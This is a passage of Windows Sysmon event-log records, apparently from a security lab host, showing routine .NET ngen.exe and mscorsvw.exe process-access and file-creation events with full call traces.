C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.991","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-001048A50D00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.991\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-001048A50D00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.991","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-001048A50D00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.991\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2256-5F25-0000-001048A50D00}\r\nTargetProcessId: 4592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.991","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2256-5F25-0000-001048A50D00}","TargetProcessId":"4592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.069\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010C0A80D00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.069","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010C0A80D00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010C0A80D00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010C0A80D00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010C0A80D00}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010C0A80D00}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:43.116\r\nProcessGuid: {41C8662E-2257-5F25-0000-0010C0A80D00}\r\nProcessId: 4600\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11f8-0\\PresentationFramework-SystemDrawing.dll\r\nCreationUtcTime: 2020-08-01 08:05:43.116","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:43.116","ProcessGuid":"{41C8662E-2257-5F25-0000-0010C0A80D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11f8-0\\PresentationFramework-SystemDrawing.dll","CreationUtcTime":"2020-08-01 08:05:43.116","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.148\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010464F0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.148","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010464F0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.148\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2252-5F25-0000-0010464F0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.148","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2252-5F25-0000-0010464F0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
